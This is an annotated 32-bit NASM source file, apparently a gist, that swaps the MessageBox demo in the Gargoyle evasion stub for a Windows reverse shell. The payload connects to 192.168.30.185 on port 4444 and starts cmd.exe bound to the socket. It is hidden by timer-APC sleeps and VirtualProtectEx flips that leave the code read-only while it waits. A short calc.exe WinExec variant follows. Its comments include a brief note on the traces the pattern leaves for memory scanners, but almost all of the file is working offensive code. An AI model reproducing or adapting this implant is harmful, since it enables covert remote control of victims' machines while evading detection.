Gargoyle setup.nasm to execute a reverse shell instead of a MessageBox
BITS 32

; Workspace handed to the stub by its host. Every field is addressed off ebx
; once the stub has loaded the workspace pointer. The function-pointer fields
; are read as already-populated values; nothing in this file fills them in.
STRUC Configuration
.initialized: RESD 1            ; non-zero after the first entry has created and armed the timer
.setup_addr: RESD 1             ; lpAddress passed to VirtualProtectEx in the tail-call chain
.setup_length: RESD 1           ; dwSize passed alongside it
.VirtualProtectEx: RESD 1       ; kernel32!VirtualProtectEx
.WaitForSingleObjectEx: RESD 1  ; kernel32!WaitForSingleObjectEx
.CreateWaitableTimer: RESD 1    ; kernel32!CreateWaitableTimer
.SetWaitableTimer: RESD 1       ; kernel32!SetWaitableTimer
.MessageBox: RESD 1             ; not referenced anywhere in this file (left over from the MessageBox demo)
.trampoline_addr: RESD 1        ; handed to SetWaitableTimer as the completion routine's argument
.sleep_handle: RESD 1           ; waitable-timer handle returned by CreateWaitableTimer
.interval: RESD 1               ; lPeriod for SetWaitableTimer
.gadget: RESD 1                 ; handed to SetWaitableTimer as the completion routine; the name suggests a ROP gadget, not visible here
.shadow: RESD 2                 ; 8 bytes: SetWaitableTimer's due time, later reused as VirtualProtectEx's lpflOldProtect out-param
.stack: RESB 0x10000            ; 64 KiB private stack; the stub points esp at its top
.trampoline: RESD 9             ; slot [0] is rewritten to VirtualProtectEx on every entry; the other slots are not written anywhere in this file
ENDSTRUC
;-----------------------------------------------------------------------
; Entry stub: void __cdecl callable(void *workspace)
; In:  [esp+4] = workspace (Configuration*)
; Side effects: ebx = workspace for the rest of the file; esp/ebp are moved
;   onto Configuration.stack; the first entry creates and arms the waitable
;   timer and sets .initialized; every entry rewrites trampoline[0].
; Never returns via ret: control falls into the payload region and then
;   into the tail-call chain that ends in `jmp VirtualProtectEx`.
;-----------------------------------------------------------------------
; Call me like void (*__cdecl callable)(void* workspace);
mov ebx, [esp+4] ; Configuration in ebx now
lea esp, [ebx + Configuration.trampoline - 4] ; Bottom of "stack": top of .stack, grows down from here
mov ebp, esp
; If we're initialized, skip to trampoline fixup
mov edx, [ebx + Configuration.initialized]
cmp edx, 0
jne reset_trampoline
; Create the timer: CreateWaitableTimer(lpTimerAttributes=NULL, bManualReset=FALSE, lpTimerName=NULL)
push 0
push 0
push 0
mov ecx, [ebx + Configuration.CreateWaitableTimer]
call ecx
mov [ebx + Configuration.sleep_handle], eax ; eax = hTimer
; Set the timer: SetWaitableTimer(hTimer, lpDueTime=&shadow, lPeriod=interval,
;   pfnCompletionRoutine=gadget, lpArgToCompletionRoutine=trampoline_addr, fResume=FALSE)
; The completion routine is delivered as an APC to this thread once it enters
; the alertable wait at the end of the file.
push 0
mov ecx, [ebx + Configuration.trampoline_addr]
push ecx
mov ecx, [ebx + Configuration.gadget]
push ecx
mov ecx, [ebx + Configuration.interval]
push ecx
lea ecx, [ebx + Configuration.shadow]
push ecx
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
mov ecx, [ebx + Configuration.SetWaitableTimer]
call ecx
; Set the initialized bit
mov [ebx + Configuration.initialized], dword 1
; Replace the return address on our trampoline
reset_trampoline:
mov ecx, [ebx + Configuration.VirtualProtectEx]
mov [ebx + Configuration.trampoline], ecx ; trampoline[0] = VirtualProtectEx
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Arbitrary code goes here. Note that the
;;;; default stack is pretty small (65k).
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;-----------------------------------------------------------------------
; Payload region (replaces the original MessageBox example). Sequence as
; written here:
;   LoadLibraryA("ws2_32") -> GetProcAddress(WSAStartup) -> WSAStartup
;   -> GetProcAddress(WSASocketA) -> WSASocketA -> GetProcAddress(connect)
;   -> connect(192.168.30.185:4444) -> CreateProcess("cmd") with
;   bInheritHandles=TRUE and the socket as all three std handles.
; Every kernel32 entry point (the 0x75...... immediates) is an absolute
; address baked in for one specific kernel32 load address; nothing here
; locates them at run time, so the sample is tied to the author's machine.
; The endpoint and command line are likewise constants in the code.
;-----------------------------------------------------------------------
; The directives below look copied from a standalone build of this payload;
; presumably no effect in the flat build of the stub -- confirm against the build.
global _start
section .text
_start:
; Get the windows socket dll name
xor eax, eax
mov ax, 0x3233 ; bytes "32\0\0"; with the next push this spells "ws2_32\0"
push eax
push dword 0x5f327377 ; "ws2_"
push esp
; LoadLibrary
mov ebx, 0x75fb8530 ; LoadLibraryA(libraryname)
call ebx
mov ebp, eax ; winsocket dll handle is saved into ebp
; Get the funtion name: WSAStartUp
xor eax, eax
mov ax, 0x7075 ; bytes "up\0\0"; spells "WSAStartup\0"
push eax
push 0x74726174 ; "tart"
push 0x53415357 ; "WSAS"
push esp
push ebp
mov ebx, 0x75faa210 ; GetProcAddress(hmodule, functionname)
call ebx
; CAll WSAStartUp
xor ebx, ebx
mov bx, 0x0190 ; 0x190 bytes reserved on the stack for WSADATA
sub esp, ebx
push esp
push ebx
call eax ; WSAStartup(wVersionRequested = 0x190 (the same constant, not MAKEWORD(2, 2)), lpWSAData = esp)
; Get the function name: WSASocketA
xor eax, eax
mov ax, 0x4174 ; bytes "tA\0\0"; spells "WSASocketA\0"
push eax
push 0x656b636f ; "ocke"
push 0x53415357 ; "WSAS"
push esp
push ebp
mov ebx, 0x75faa210 ; GetProcAddress(hmodule, functionname)
call ebx
; Call WSASocket
xor ebx, ebx
push ebx ; dwFlags = 0
push ebx ; g = 0
push ebx ; lpProtocolInfo = NULL
xor ecx, ecx
mov cl, 6
push ecx ; protocol = IPPROTO_TCP
inc ebx
push ebx ; type = SOCK_STREAM
inc ebx
push ebx ; af = AF_INET
call eax ; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
; IPPROTO_TCP = 6, NULL,
; (unsigned int)NULL, (unsigned int)NULL);
xchg eax, edi ; Save the socket handle into edi
; Get the function name: connect
mov ebx, 0x74636565 ; after the shift below: bytes "ect\0"
shr ebx, 8
push ebx
push 0x6e6e6f63 ; "conn"; spells "connect\0"
push esp
push ebp
mov ebx, 0x75faa210 ; GetProcAddress(hmodule, functionname)
call ebx
; Call connect
; sockaddr_in is built top-down: sin_addr, sin_port, sin_family. Only 8 of
; its 16 bytes are written; the sin_zero bytes are whatever was already on the stack.
push 0xb91ea8c0 ; sin_addr: bytes c0 a8 1e b9 = 192.168.30.185 (network order)
push word 0x5c11 ; 0x115c = port 4444 (network order)
xor ebx, ebx
add bl, 2
push word bx ; sin_family = AF_INET
mov edx, esp ; edx = &sockaddr_in
push byte 16 ; namelen = sizeof(sockaddr_in)
push edx
push edi
call eax ; connect(s1, (SOCKADDR*) &hax, sizeof(hax) = 16);
; Call CreateProcess with redirected streams
mov edx, 0x646d6363 ; after the shift below: "cmd\0"
shr edx, 8
push edx
mov ecx, esp ; ecx = lpCommandLine ("cmd")
xor edx, edx ; edx = 0 for the rest of the argument build
sub esp, 16
mov ebx, esp ; PROCESS_INFORMATION (16 bytes, uninitialised)
; STARTUPINFOA built top-down, 17 dwords; field names per the Win32 layout
push edi ; hStdError  = socket
push edi ; hStdOutput = socket
push edi ; hStdInput  = socket
push edx ; lpReserved2 = NULL
push edx ; cbReserved2 = 0 / wShowWindow = 0
xor eax, eax
inc eax
rol eax, 8
inc eax ; eax = 0x101
push eax ; dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
push edx ; dwFillAttribute
push edx ; dwYCountChars
push edx ; dwXCountChars
push edx ; dwYSize
push edx ; dwXSize
push edx ; dwY
push edx ; dwX
push edx ; lpTitle
push edx ; lpDesktop
push edx ; lpReserved
xor eax, eax
add al, 44
push eax ; cb
mov eax, esp ; STARTUP_INFO
push ebx ; PROCESS_INFORMATION
push eax ; STARTUP_INFO
push edx ; lpCurrentDirectory = NULL
push edx ; lpEnvironment = NULL
push edx ; dwCreationFlags = 0
xor eax, eax
inc eax
push eax ; bInheritHandles = TRUE: the child receives the socket as its std handles
push edx ; lpThreadAttributes = NULL
push edx ; lpProcessAttributes = NULL
push ecx ; lpCommandLine = "cmd"
push edx ; lpApplicationName = NULL
mov ebx, 0x75fc6c10 ; CreateProcess(NULL, commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
call ebx
end:
xor edx, edx
; ExitProcess is left disabled so control falls through into the tail-call chain below
;push eax
;mov eax, 0x75982acf ; ExitProcess(exitcode)
;call eax
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Time to setup tail calls to go down
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Three stdcall frames are stacked so that each API "returns" into the next:
;   VirtualProtectEx(hProcess=-1 (current process), setup_addr, setup_length,
;                    PAGE_READONLY, lpflOldProtect=&shadow)
;     -> returns into WaitForSingleObjectEx(sleep_handle, INFINITE, bAlertable=TRUE)
;     -> returns into a second identical WaitForSingleObjectEx frame
;     -> whose return address is 0 (expected never to be reached; the timer
;        APC armed on first entry is what takes the thread away from here).
; Defender note: while the thread is parked, the setup region reads as
; PAGE_READONLY rather than executable, and the thread's return addresses
; point at kernel32 exports rather than at this code -- those, together with
; a timer completion routine that (if .gadget is the ROP gadget its name
; suggests) is not a function entry point, are the artefacts this pattern
; leaves for memory scanners and stack-walking tooling.
; Setup arguments for WaitForSingleObjectEx x1
push 1 ; bAlertable = TRUE
push 0xFFFFFFFF ; dwMilliseconds = INFINITE
mov ecx, [ebx + Configuration.sleep_handle]
push ecx ; hHandle
push 0 ; Return address never ret'd
; Setup arguments for WaitForSingleObjectEx x2
push 1 ; bAlertable = TRUE
push 0xFFFFFFFF ; dwMilliseconds = INFINITE
mov ecx, [ebx + Configuration.sleep_handle]
push ecx ; hHandle
; Return address of the first wait frame: a second WaitForSingleObjectEx
mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
push ecx
; Setup arguments for VirtualProtectEx
lea ecx, [ebx + Configuration.shadow]
push ecx ; lpflOldProtect
push 2 ; PAGE_READONLY
mov ecx, [ebx + Configuration.setup_length]
push ecx ; dwSize
mov ecx, [ebx + Configuration.setup_addr]
push ecx ; lpAddress
push dword 0xffffffff ; hProcess = (HANDLE)-1, the current-process pseudo-handle
; Return address for VirtualProtectEx: falls straight into WaitForSingleObjectEx
mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
push ecx
; Jump to VirtualProtectEx
mov ecx, [ebx + Configuration.VirtualProtectEx]
jmp ecx
; Second gist file; appears to be a drop-in alternative for the payload region
; above: WinExec("calc.exe", SW_SHOWNORMAL), the usual proof-of-execution
; stand-in. 0x75fef890 is again an absolute kernel32 address for one specific
; load address and is not resolved at run time.
; Hardcoded WinExec to execute calc.exe
xor eax,eax
push eax ; NUL terminator
push ".exe" ; NASM packs a 4-character string literal into a little-endian dword
push "calc" ; together: "calc.exe\0" on the stack
mov eax,esp ; eax = lpCmdLine
push 1 ; uCmdShow = SW_SHOWNORMAL
push eax ; lpCmdLine
mov ebx, 0x75fef890 ; address of WinExec
call ebx
mov esp, ebp ; discard the temporaries; presumably back to the stack base the entry stub saved in ebp -- confirm in the assembled file